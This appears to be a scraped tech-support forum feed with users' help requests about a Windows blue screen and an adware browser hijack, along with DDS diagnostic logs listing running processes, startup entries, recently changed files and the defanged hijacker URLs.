S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2016-11-29 125112]
S2 dbupdate;Dropbox Update Service (dbupdate);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-10-7 143144]
S3 AppleChargerSrv;AppleChargerSrv;system32\AppleChargerSrv.exe --> system32\AppleChargerSrv.exe [?]
S3 dbupdatem;Dropbox Update Service (dbupdatem);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-10-7 143144]
S3 HTCAND64;HTC Device Driver;C:\Windows\System32\drivers\ANDROIDUSB.sys [2009-11-2 33736]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2016-12-14 114688]
S3 Netaapl;Apple Mobile Device Ethernet Service;C:\Windows\System32\drivers\netaapl64.sys [2014-8-15 23040]
S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 27136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2015-10-7 59392]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2015-6-17 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2015-10-8 1255736]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2015-4-29 23200]
.
=============== File Associations ===============
.
ShellExec: dreamweaver.exe: Open="C:\Program Files (x86)\Adobe\Adobe Dreamweaver CS3\dreamweaver.exe", "%1"
.
=============== Created Last 30 ================
.
2017-01-06 10:56:59 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{BDDBA143-EEC9-467C-8A44-FE517CB966FF}\offreg.1244.dll
2017-01-06 10:56:07 11781064 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{BDDBA143-EEC9-467C-8A44-FE517CB966FF}\mpengine.dll
2016-12-24 03:25:57 203680 ----a-w- C:\Windows\System32\drivers\zamguard64.sys
2016-12-24 03:25:57 203680 ----a-w- C:\Windows\System32\drivers\zam64.sys
2016-12-24 03:25:56 -------- d-----w- C:\Users\Steve\AppData\Local\Zemana
2016-12-24 03:16:27 -------- d-----w- C:\ProgramData\HitmanPro
2016-12-21 18:15:36 75888 ----a-w- C:\Windows\System32\drivers\dbx-stable.sys
2016-12-21 18:15:36 75888 ----a-w- C:\Windows\System32\drivers\dbx-dev.sys
2016-12-21 18:15:36 75888 ----a-w- C:\Windows\System32\drivers\dbx-canary.sys
2016-12-21 18:15:36 42096 ----a-w- C:\Windows\System32\DbxSvc.exe
.
==================== Find3M ====================
.
2016-12-14 09:00:14 802904 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2016-12-14 09:00:14 144472 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2016-11-30 03:34:16 28352 ----a-w- C:\Windows\SysWow64\aspnet_counters.dll
2016-11-30 03:34:16 19112 ----a-w- C:\Windows\SysWow64\msvcr110_clr0400.dll
2016-11-30 03:34:16 19112 ----a-w- C:\Windows\SysWow64\msvcr100_clr0400.dll
2016-11-30 03:34:16 19112 ----a-w- C:\Windows\SysWow64\msvcp110_clr0400.dll
2016-11-30 03:27:48 30400 ----a-w- C:\Windows\System32\aspnet_counters.dll
2016-11-30 03:27:48 19112 ----a-w- C:\Windows\System32\msvcr110_clr0400.dll
2016-11-30 03:27:48 19112 ----a-w- C:\Windows\System32\msvcr100_clr0400.dll
2016-11-30 03:27:48 19112 ----a-w- C:\Windows\System32\msvcp110_clr0400.dll
2016-11-21 18:16:29 95464 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2016-11-21 18:16:29 154856 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2016-11-20 16:20:03 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2016-11-20 16:20:03 82944 ----a-w- C:\Windows\SysWow64\bcrypt.dll
2016-11-20 16:20:03 666112 ----a-w- C:\Windows\SysWow64\rpcrt4.dll
2016-11-20 16:20:01 65536 ----a-w- C:\Windows\SysWow64\TSpkg.dll
2016-11-20 16:20:01 172032 ----a-w- C:\Windows\SysWow64\wdigest.dll
2016-11-20 16:19:57 254464 ----a-w- C:\Windows\SysWow64\schannel.dll
2016-11-20 16:19:57 22016 ----a-w- C:\Windows\SysWow64\secur32.dll
2016-11-20 16:19:57 141312 ----a-w- C:\Windows\SysWow64\rpchttp.dll
2016-11-20 16:19:53 261120 ----a-w- C:\Windows\SysWow64\msv1_0.dll
2016-11-20 16:19:53 223232 ----a-w- C:\Windows\SysWow64\ncrypt.dll
2016-11-20 16:19:52 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2016-11-20 16:19:51 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2016-11-20 16:19:49 553472 ----a-w- C:\Windows\SysWow64\kerberos.dll
2016-11-20 16:19:47 84992 ----a-w- C:\Windows\SysWow64\hlink.dll
2016-11-20 16:19:43 17408 ----a-w- C:\Windows\SysWow64\credssp.dll
2016-11-20 16:19:42 342528 ----a-w- C:\Windows\SysWow64\certcli.dll
2016-11-20 16:19:40 690688 ----a-w- C:\Windows\SysWow64\adtschema.dll
2016-11-20 16:04:54 64000 ----a-w- C:\Windows\System32\auditpol.exe
2016-11-20 15:58:19 159744 ----a-w- C:\Windows\System32\drivers\mrxsmb.sys
2016-11-20 15:57:45 291328 ----a-w- C:\Windows\System32\drivers\mrxsmb10.sys
2016-11-20 15:57:43 129536 ----a-w- C:\Windows\System32\drivers\mrxsmb20.sys
2016-11-20 15:57:01 30720 ----a-w- C:\Windows\System32\lsass.exe
2016-11-20 15:57:00 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2016-11-20 15:52:42 36352 ----a-w- C:\Windows\SysWow64\cryptbase.dll
2016-11-20 14:07:52 467392 ----a-w- C:\Windows\System32\drivers\cng.sys
2016-11-17 16:41:49 370920 ----a-w- C:\Windows\System32\clfs.sys
2016-11-12 19:48:25 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2016-11-12 19:48:08 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2016-11-12 19:28:01 66560 ----a-w- C:\Windows\System32\iesetup.dll
2016-11-12 19:26:46 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2016-11-12 19:26:27 417792 ----a-w- C:\Windows\System32\html.iec
2016-11-12 19:25:50 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2016-11-12 19:25:41 576000 ----a-w- C:\Windows\System32\vbscript.dll
2016-11-12 19:08:26 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2016-11-12 19:08:24 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2016-11-12 19:07:47 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2016-11-12 18:56:20 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2016-11-12 18:53:10 6049280 ----a-w- C:\Windows\System32\jscript9.dll
2016-11-12 18:47:35 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2016-11-12 18:41:49 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2016-11-12 18:30:22 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2016-11-12 18:29:26 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2016-11-12 18:29:13 498688 ----a-w- C:\Windows\SysWow64\vbscript.dll
2016-11-12 18:29:05 341504 ----a-w- C:\Windows\SysWow64\html.iec
2016-11-12 18:27:51 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2016-11-12 18:14:53 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2016-11-12 18:14:16 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2016-11-12 18:08:54 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2016-11-12 18:08:32 2131456 ----a-w- C:\Windows\System32\inetcpl.cpl
2016-11-12 17:57:35 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2016-11-12 17:37:20 4608000 ----a-w- C:\Windows\SysWow64\jscript9.dll
2016-11-12 17:36:39 2055680 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2016-11-12 17:36:13 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2016-11-12 17:35:33 2920960 ----a-w- C:\Windows\System32\wininet.dll
2016-11-12 17:05:59 2444800 ----a-w- C:\Windows\SysWow64\wininet.dll
2016-11-10 16:32:41 1009152 ----a-w- C:\Windows\System32\user32.dll
2016-11-10 16:19:40 833024 ----a-w- C:\Windows\SysWow64\user32.dll
2016-11-09 16:41:27 114408 ----a-w- C:\Windows\System32\consent.exe
2016-11-09 16:33:43 2048 ----a-w- C:\Windows\System32\tzres.dll
2016-11-09 16:33:34 504320 ----a-w- C:\Windows\System32\msihnd.dll
2016-11-09 16:33:34 3244032 ----a-w- C:\Windows\System32\msi.dll
2016-11-09 16:33:34 25088 ----a-w- C:\Windows\System32\msimsg.dll
2016-11-09 16:33:26 70144 ----a-w- C:\Windows\System32\appinfo.dll
2016-11-09 16:33:26 1941504 ----a-w- C:\Windows\System32\authui.dll
2016-11-09 16:17:52 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2016-11-09 16:17:31 337408 ----a-w- C:\Windows\SysWow64\msihnd.dll
2016-11-09 16:17:31 25088 ----a-w- C:\Windows\SysWow64\msimsg.dll
2016-11-09 16:17:31 2365440 ----a-w- C:\Windows\SysWow64\msi.dll
2016-11-09 16:17:18 1806848 ----a-w- C:\Windows\SysWow64\authui.dll
2016-11-09 16:02:19 128512 ----a-w- C:\Windows\System32\msiexec.exe
2016-11-09 15:55:06 73216 ----a-w- C:\Windows\SysWow64\msiexec.exe
2016-11-06 16:33:24 404992 ----a-w- C:\Windows\System32\gdi32.dll
2016-11-06 16:16:46 312832 ----a-w- C:\Windows\SysWow64\gdi32.dll
2016-11-06 16:01:47 3219456 ----a-w- C:\Windows\System32\win32k.sys
2016-11-02 15:36:15 382696 ----a-w- C:\Windows\System32\atmfd.dll
2016-11-02 15:32:08 41472 ----a-w- C:\Windows\System32\lpk.dll
2016-11-02 15:32:05 100864 ----a-w- C:\Windows\System32\fontsub.dll
2016-11-02 15:32:03 14336 ----a-w- C:\Windows\System32\dciman32.dll
2016-11-02 15:32:01 46080 ----a-w- C:\Windows\System32\atmlib.dll
2016-11-02 15:22:36 308456 ----a-w- C:\Windows\SysWow64\atmfd.dll
2016-11-02 15:16:31 25600 ----a-w- C:\Windows\SysWow64\lpk.dll
2016-11-02 15:16:15 70656 ----a-w- C:\Windows\SysWow64\fontsub.dll
2016-11-02 15:16:14 10240 ----a-w- C:\Windows\SysWow64\dciman32.dll
2016-11-02 14:53:37 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2016-10-27 15:33:31 802304 ----a-w- C:\Windows\System32\usp10.dll
2016-10-27 15:20:17 627712 ----a-w- C:\Windows\SysWow64\usp10.dll
2016-10-26 21:29:06 485032 ------w- C:\Windows\System32\MpSigStub.exe
2016-10-15 15:31:21 976896 ----a-w- C:\Windows\System32\inetcomm.dll
.
============= FINISH: 12:30:33.26 ===============

Attached Files

attach.txt (11.4 KB)

↧

Windows Blue Screen

January 8, 2017, 7:37 am

≫ Next: Malware/Spyware on my computer

≪ Previous: Chrome Update Malware

Hello,

Welcome everybody

I would really appreciate some help:-

I have a blue screen that appears with pc ran into problems and needs to restart.
windows.com/stopcode for more information.

I am running windows 10 32bit system (windows 10 from free upgrade last year)

Thank you for taking the time to read my post

Kind Regards
Tania

↧

Malware/Spyware on my computer

January 8, 2017, 9:03 am

≫ Next: Trying to run DDS

≪ Previous: Windows Blue Screen

Hello Tech Support Forum,

I had loaned my computer to my nephew yesterday...and it looks like he may have mistakenly clicked on a malware/spyware program which has changed my homepage to safefinder.com.

Below is the dds.txt results and the attach.txt is attached.

I hope that you can help me.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.0 BrowserJavaVersion: 11.111.2
Run by King at 11:51:41 on 2017-01-08
Microsoft Windows 10 Pro 10.0.14393.0.1252.1.1033.18.7888.4834 [GMT -5:00]
.
AV: Kaspersky Total Security *Enabled/Updated* {86367591-4BE4-AE08-2FD9-7FCB8259CD98}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Kaspersky Total Security *Enabled/Updated* {3D579475-6DDE-A186-1569-44B9F9DE8725}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky Total Security *Enabled* {BE0DF4B4-018B-AF50-0486-D6FE7C8A8AE3}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\system32\ibmpmsvc.exe
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\AUDIODG.EXE
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\system32\DbxSvc.exe
C:\WINDOWS\system32\BtwRSupportService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avp.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\WINDOWS\system32\svchost.exe -k apphost
C:\ProgramData\Logic Handler\set.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\EMSService.exe
C:\WINDOWS\SysWoW64\svchost.exe -k hpdevmgmt
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files\Lenovo\Communications Utility\CAMMUTE.exe
C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe
C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\mqsvc.exe
C:\WINDOWS\system32\svchost.exe -k iissvcs
C:\Windows\SysWOW64\NLSSRV32.EXE
C:\ProgramData\NetworkPacketManitor\Nettrans.exe
C:\WINDOWS\SysWoW64\NetUtils2016.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe
C:\Program Files (x86)\4baf5696-ef63-4372-a50c-30bd8cd532291483831172\knsCFBC.tmp
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\Program Files (x86)\SecureW2\sw2_service.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files\LENOVO\HOTKEY\TPHKSVC.exe
C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe
C:\Program Files\LENOVO\HOTKEY\TPHKLOAD.exe
C:\Program Files\LENOVO\HOTKEY\MICMUTE.exe
C:\Program Files\ThinkVantage Fingerprint Software\upeksvr.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Windows\system32\svchost.exe -k HPService
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
C:\WINDOWS\system32\taskhostw.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\System32\RuntimeBroker.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
svchost.exe
C:\PROGRA~1\LENOVO\VIRTSCRL\virtscrl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\PROGRA~1\Lenovo\HOTKEY\tpnumlkd.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynLenovoHelper.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\Windows\System32\smartscreen.exe
C:\PROGRA~2\MOZILL~1\firefox.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Windows\System32\TpShocks.exe
C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
C:\Windows\System32\EmsServiceHelper.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\WINDOWS\system32\rundll32.exe
C:\PROGRA~1\Lenovo\HOTKEY\TPONSCR.EXE
C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\PROGRA~1\HP\HPENVY~1\Bin\HPNETW~1.EXE
C:\Users\King\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\WINDOWS\sysWOW64\wbem\wmiprvse.exe
C:\Program Files (x86)\Dolby Advanced Audio v2\pcee4.exe
C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe
C:\Program Files (x86)\SecureW2\sw2_tray.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DeviceAgent.exe
C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe
C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
C:\Program Files (x86)\Western Digital\WD App Manager\WDAppManager.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
C:\PROGRAM FILES (X86)\WESTERN DIGITAL\WD APP MANAGER\PLUGINS\WD BACKUP\App\WDBackupService.exe
C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Users\King\AppData\Roaming\DailyBee\DailyBee.exe
C:\Users\King\AppData\Roaming\DailyBee\DailyBee.exe
C:\Users\King\AppData\Roaming\DailyBee\DailyBee.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 1.0\ksde.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 1.0\ksdeui.exe
C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PrivacyIconClient.exe
\\?\C:\WINDOWS\system32\wbem\WMIADAP.EXE
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Users\King\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
C:\Windows\System32\InstallAgent.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\InstallAgentUserBroker.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPhuTaZ17vJ3frYi3tu3Ogeh5wq8PGBP668Kb01qmK68B0H3e4uN278ch3MwXhoIgdAtlk_77PcQMchp6luA0gExYRQXNhrNa4QWTjIFNtwhXL_QtINwm7jhJAlGDd04ewzpU9S-kYkr6yjD7qACxDA7jEkYGv6OBGGlGCm2uc
uSearch Bar = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPhuTaZ17vJ3frYi3tu3Ogeh5wq8PGBP668Kb01qmK68B0H3e4uN278ch3MwXhoIgdAtlk_77PcQMchpKttnTSluHTGxiwYTcSBNYa-4MBDXuo7Px7wMdm7bLmOwBL3zTcQOgmS6YkaS2afMAu4FhDoKnSVW0ZnmEvfFJ5TBZf&q={searchTerms}
uSearch Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPhuTaZ17vJ3frYi3tu3Ogeh5wq8PGBP668Kb01qmK68B0H3e4uN278ch3MwXhoIgdAtlk_77PcQMchpKttnTSluHTGxiwYTcSBNYa-4MBDXuo7Px7wMdm7bLmOwBL3zTcQOgmS6YkaS2afMAu4FhDoKnSVW0ZnmEvfFJ5TBZf&q={searchTerms}
BHO: &Yahoo! Toolbar Helper: {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll
BHO: HP Print Enhancer: {0347C33E-8762-4905-BF09-768834316C61} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll
BHO: Kaspersky Protection: {2E38825B-8815-42CF-9126-C58BC28D4591} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\IEExt\ie_plugin.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll
BHO: Symantec VIP Access Add-On: {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} - C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll
BHO: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
BHO: SingleInstance Class: {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll
BHO: HP Smart BHO Class: {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
TB: Yahoo! Toolbar: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll
TB: Kaspersky Protection Toolbar: {093F479D-712E-46CD-9E06-62E734A05F68} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\IEExt\ie_plugin.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
uRun: [iCloudServices] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
uRun: [ApplePhotoStreams] C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
uRun: [Uploader] C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
uRun: [HP ENVY 4520 series (NET)] "C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH5A92F0NG0660:NW" -scfn "HP ENVY 4520 series (NET)" -AutoStart 1
uRun: [OneDrive] "C:\Users\King\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [iCloudDrive] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [IMSS] "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PIconStartup.exe"
mRun: [Dolby Advanced Audio v2] "C:\Program Files (x86)\Dolby Advanced Audio v2\pcee4.exe" -autostart
mRun: [Intel AppUp(SM) center] "C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe" --domain-id F0399437-FD0C-4A48-B101-F0314A6172E4
mRun: [Lenovo Registration] C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot
mRun: [SecureW2 Tray] C:\Program Files (x86)\SecureW2\sw2_tray.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [DBAgent] "C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe" /WinStart
mRun: [WDAppManager] C:\Program Files (x86)\Western Digital\WD App Manager\AppManagerLauncher.exe
mRun: [WD Drive Unlocker] C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe
mRun: [DriveUtilitiesHelper] C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
mRun: [WD Quick View] C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
mRun: [DailyBee] C:\Users\King\AppData\Roaming\DailyBee\DailyBee.exe su
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\StartUp\HPDIGI~1.LNK - C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
mPolicies-Explorer: NoDriveTypeAutoRun = dword:60
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: HideFastUserSwitching = dword:1
IE: E&xport to Microsoft Excel - C:\Program Files (x86)\Microsoft Office\OFFICE11\EXCEL.EXE/3000
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll/204
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{287b1ad6-97da-4607-a580-2abda2c5ac79} : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{287b1ad6-97da-4607-a580-2abda2c5ac79}\84F4D454D203347363D223E243 : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{287b1ad6-97da-4607-a580-2abda2c5ac79}\84F4D454D203347363D253 : DHCPNameServer = 75.75.75.75 75.75.76.76
